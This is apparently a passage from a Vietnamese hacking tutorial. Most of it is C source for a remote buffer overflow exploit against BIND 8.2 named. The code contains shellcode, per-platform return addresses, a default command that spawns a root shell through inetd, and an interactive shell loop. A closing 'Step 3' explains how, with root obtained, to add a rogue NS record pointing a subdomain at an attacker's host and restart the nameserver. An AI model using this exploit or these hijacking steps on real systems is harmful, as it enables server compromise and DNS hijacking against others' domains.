0x2f,0x2e,0x2e,0x2f,0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
0xff,0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,
0x0,0x2d,0x63,0x0,0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f,
0x59,0x4f,0x59,0x4f,0x59,0x4f,0x0};
struct arch
{
int id;
char *name;
char *code;
int codesize;
unsigned long safe;
unsigned long ret;
int length;
};
struct arch archlist[] =
{
{1, "Linux Redhat 6.x - named 8.2/8.2.1 (from rpm)", linuxcode, sizeof(linuxcode), 0, 0xbfffd6c3, 6500},
{2, "Linux SolarDiz's non-exec stack patch - named 8.2/8.2.1",linuxcode, sizeof(linuxcode), 0, 0x80f79ae, 6500},
{3, "Solaris 7 (0xff) - named 8.2.1", sc, sizeof(sc), 0xffbea738, 0xffbedbd0, 11000},
{4, "Solaris 2.6 - named 8.2.1", sc, sizeof(sc), 0xefffa000, 0xefffe5d0, 11000},
{5, "FreeBSD 3.2-RELEASE - named 8.2", bsdcode, sizeof(bsdcode), 1, 0xbfbfbdb8, 7000},
{6, "OpenBSD 2.5 - named 8.2", bsdcode, sizeof(bsdcode), 1, 0xefbfbb00, 7000},
{7, "NetBSD 1.4.1 - named 8.2.1", bsdnochroot, sizeof(bsdnochroot), 1, 0xefbfbb00, 7000},
{0, 0, 0, 0}
};
int arch=0;
char *command=0;
/* these two dns routines from dspoof/jizz */
/* pull out a compressed query name */
/*
 * Decode a (possibly compressed) DNS name starting at p into s as a dotted
 * string with a trailing '.' and a NUL.  buf is the start of the packet and
 * the base for compression pointers.  Returns the position just after the
 * name in the original byte stream: after the first compression pointer if
 * one was followed, otherwise after the terminating zero length.
 * Review notes: neither p nor s is bounded - a length byte that runs past
 * the packet is copied anyway, a compression pointer that refers back to
 * itself loops forever, the 16-bit read goes through a cast of a possibly
 * unaligned address, and the output is written without a limit (the caller
 * in this file gives it a 512-byte stack buffer).  Because len is loaded
 * from a plain char, bytes >= 0x80 sign-extend where char is signed.
 */
char *dnssprintflabel(char *s, char *buf, char *p)
{
unsigned short i,len;
char *b=NULL;
len=(unsigned short)*(p++);
while (len)
{
/* 0xC0.. = compression pointer: remember the resume point (once) and
 * continue at the 14-bit offset inside buf */
while (len >= 0xC0)
{
if (!b)
b=p+1;
p=buf+(ntohs(*((unsigned short *)(p-1))) & ~0xC000);
len=(unsigned short)*(p++);
}
for (i=0;i<len;i++)
*(s++)=*(p++);
*(s++)='.';
len=(unsigned short)*(p++);
}
*(s++)=0;
if (b)
return(b);
return(p);
}
/* store a query name */
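/*
 * Encode the dotted name label into DNS wire format at p: each component
 * becomes a length byte followed by its bytes, and the sequence is closed
 * with a zero length byte.  A lone trailing '.' (absolute name) is accepted
 * and ignored.  Returns the position just after the terminator.
 * label may be NULL or empty; either yields just the terminator.
 * p is not bounded: the caller must provide strlen(label) + 2 bytes.
 * The original tested *label before testing label itself, so a NULL label
 * was dereferenced before the check could reject it.
 */
char *dnsaddlabel(char *p, char *label)
{
char *p1;
/* test the pointer before dereferencing it */
while (label && *label)
{
/* lone trailing dot: end of an absolute name */
if ((*label == '.') && (!*(label+1)))
break;
p1=strchr(label,'.');
if (!p1)
p1=strchr(label,0);
/* length byte, then the component itself; components longer than 63
 * bytes are not rejected here even though the wire format has no room
 * for them */
*(p++)=(char)(p1-label);
memcpy(p,label,p1-label);
p+=p1-label;
label=p1;
if (*p1)
label++;
}
*(p++)=0;
return(p);
}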
void make_overflow(char *a)
{
int i;
unsigned long *b;
unsigned char *c;
char sbuf[4096];
if (archlist[arch].safe==0) /* linux */
{
memset(a,0x90,4134);
memcpy(a+3500,archlist[arch].code,archlist[arch].codesize);
if (command)
strcpy(a+3500+archlist[arch].codesize, command);
else
strcpy(a+3500+archlist[arch].codesize, "exit");
b=(unsigned long*)(a+4134);
for (i=0;i<20;i++)
*b++=archlist[arch].ret;
}
else if (archlist[arch].safe==1) /* bsd */
{
memset(a,0x90,4134);
memcpy(a+3300,archlist[arch].code,archlist[arch].codesize);
if (command)
strcpy(a+3300+archlist[arch].codesize, command);
else
strcpy(a+3300+archlist[arch].codesize, "exit");
b=(unsigned long*)(a+4134);
for (i=0;i<20;i++)
*b++=archlist[arch].ret;
}
else /*SPARC*/
{
memset(a,0x0,11000);
b=(unsigned long*)(a+4438);
for (i=0;i<1500;i++)
*b++=htonl(0xac15a16e);
c=(char *)b;
for (i=0;i<archlist[arch].codesize;i++)
*c++=archlist[arch].code[i];
if (command)
strcpy(c, command);
else
strcpy(c, "echo \"ingreslock stream tcp nowait root /bin/sh sh -i\" \
>>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob;/bin/rm -f /tmp/bob ");
b=(unsigned long*)(a+4166);
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //i2 - significant
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //i5 - significant
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //o0 - significant
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //o2 - significant
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //o6 - significant
*b++=htonl(archlist[arch].ret); //o7 - retaddr
}
}
int form_response(HEADER *packet, char *buf)
{
char query[512];
int qtype;
HEADER *dnsh;
char *p;
char *walker;
memset(buf,0,sizeof(buf));
dnsh = (HEADER *) buf;
dnsh->id = packet->id;
dnsh->qr=1;
dnsh->aa=1;
dnsh->qdcount = htons(1);
dnsh->ancount = htons(1);
dnsh->arcount = htons(1);
dnsh->rcode = 0;
walker=(char*)(dnsh+1);
p=dnssprintflabel(query, (char *)packet, (char*)(packet+1));
query[strlen(query) - 1] = 0;
qtype=*((unsigned short *)p);
printf("%s type=%d\n",query, ntohs(qtype));
/* first, the query */
walker=dnsaddlabel(walker, query);
PUTSHORT(ntohs(qtype), walker);
//PUTSHORT(htons(T_PTR), walker);
PUTSHORT(1,walker);
/* then, our answer */
/* query IN A 1.2.3.4 */
walker=dnsaddlabel(walker, query);
PUTSHORT(T_A, walker);
PUTSHORT(1, walker);
PUTLONG(60*5, walker);
PUTSHORT(4, walker);
sprintf(walker,"%c%c%c%c",1,2,3,4);
walker+=4;
/* finally, we make named do something more interesting */
walker=dnsaddlabel(walker, query);
PUTSHORT(T_NXT, walker);
PUTSHORT(1, walker);
PUTLONG(60*5, walker);
/* the length of one label and our arbitrary data */
PUTSHORT(archlist[arch].length+7, walker);
PUTSHORT(6, walker);
sprintf(walker,"admadm");
walker+=6;
PUTSHORT(0, walker);
make_overflow(walker);
walker+=archlist[arch].length;
PUTSHORT(0, walker);
return walker-buf;
}
#define max(x,y) ((x)>(y)?(x):(y))
int proxyloop(int s)
{
char snd[1024], rcv[1024];
fd_set rset;
int maxfd, n;
sleep(1);
printf("Entering proxyloop..\n");
strcpy(snd, "cd /; uname -a; pwd; id;\n");
write(s, snd, strlen(snd));
for (;;)
{
FD_SET(fileno(stdin), &rset);
FD_SET(s, &rset);
maxfd = max(fileno(stdin), s) + 1;
select(maxfd, &rset, NULL, NULL, NULL);
if (FD_ISSET(fileno(stdin), &rset))
{
bzero(snd, sizeof(snd));
fgets(snd, sizeof(snd) - 2, stdin);
write(s, snd, strlen(snd));
}
if (FD_ISSET(s, &rset))
{
bzero(rcv, sizeof(rcv));
if ((n = read(s, rcv, sizeof(rcv))) == 0)
exit(0);
if (n < 0)
{
return -3;
}
fputs(rcv, stdout);
}
}
return 0;
}
int main(int argc, char **argv)
{
int s, fromlen, res, sl, s2;
struct sockaddr_in sa, from, to;
char buf[16384];
char sendbuf[16384];
unsigned short ts;
int i;
if (argc<2)
{
fprintf(stderr,"Usage: %s architecture [command]\n", argv[0]);
fprintf(stderr,"Available architectures:\n");
i=-1;
while(archlist[++i].id)
fprintf(stderr," %d: %s\n",archlist[i].id,archlist[i].name);
exit(1);
}
arch=atoi(argv[1])-1;
if (argc==3)
command=argv[2];
if ((s=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))==-1)
{
perror("socket");
exit(1);
}
bzero(&sa, sizeof sa);
sa.sin_family=AF_INET;
sa.sin_addr.s_addr=INADDR_ANY;
sa.sin_port=htons(53);
if (bind(s, (struct sockaddr *)&sa, sizeof(sa))==-1)
{
perror("bind");
exit(1);
}
do
{
fromlen=sizeof(from);
if ((res=recvfrom(s, buf, sizeof buf, 0, (struct sockaddr *)&from,
&fromlen)) == -1)
{
perror("recvfrom");
exit(1);
}
printf("Received request from %s:%d for ", inet_ntoa(from.sin_addr),
ntohs(from.sin_port));
sl=form_response((HEADER *)buf,sendbuf);
/* now lets connect to the nameserver */
bzero(&to, sizeof(to));
to.sin_family=AF_INET;
to.sin_addr=from.sin_addr;
to.sin_port=htons(53);
if ((s2=socket(AF_INET, SOCK_STREAM, 0))==-1)
{
perror("socket");
exit(1);
}
if (connect(s2, (struct sockaddr *)&to, sizeof to)==-1)
{
perror("connect");
exit(1);
}
ts=htons(sl);
write(s2,&ts,2);
write(s2,sendbuf,sl);
if (archlist[arch].safe>1)
close(s2);
}
while (archlist[arch].safe>1); /* infinite loop for sparc */
proxyloop(s2);
exit(1);
}
Bước 3: với root shell đã có ở bước 2, chúng ta sẽ thay đổi vài dữ liệu tên miền của primary DNS server. Như bạn biết, mỗi primary DNS server sẽ có uy quyền (authoritative) về một domain trên mạng. Để hack DNS server, bạn chỉ việc thêm một bản ghi NS cho sub-domain trong file vùng (zone) và restart lại name server service. Đầu tiên, bạn xác định thư mục của các file vùng. Hãy tìm trong file cấu hình của BIND (/etc/named.conf) dòng có dạng ‘directory "/var/named";’. Thư mục lưu các file vùng là "/var/named". Tìm tiếp trong file named.conf dòng ‘type master;’, dòng 'file' ở phía dưới sẽ cho biết tên file vùng:
Zone "mydomain.com" {
Type master;
File "mydomain.com.zone"
};
Đường dẫn đầy đủ của file vùng cần sửa đổi là "/var/named/mydomain.com.zone". Nếu cat file này, bạn sẽ thấy một bản ghi SOA ở đầu file:
@ IN NS NS.UU.mydomain.com.
Để thay đổi 'mysubdomain.mydomain.com’ trỏ đến địa chỉ IP của 'attacking.box.com’, bạn hãy thêm vào file vùng này một bản ghi NS như sau:
mysubdomain IN NS attacking.box.com.
Nhớ đừng quên dấu '.' ở cuối nha. Bây giờ restart lại server bằng dòng lệnh ‘/usr/sbin/ndc restart’ là xong!
Bạn thử thẩm vấn DNS trên target vừa bị hack xem sao!
$nslookup
>server <target>
>www.mysubdomain.mydomain.com